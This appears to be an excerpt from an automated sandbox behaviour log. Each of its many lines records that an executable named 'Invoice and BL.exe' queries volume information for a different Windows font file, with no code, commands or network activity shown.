            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
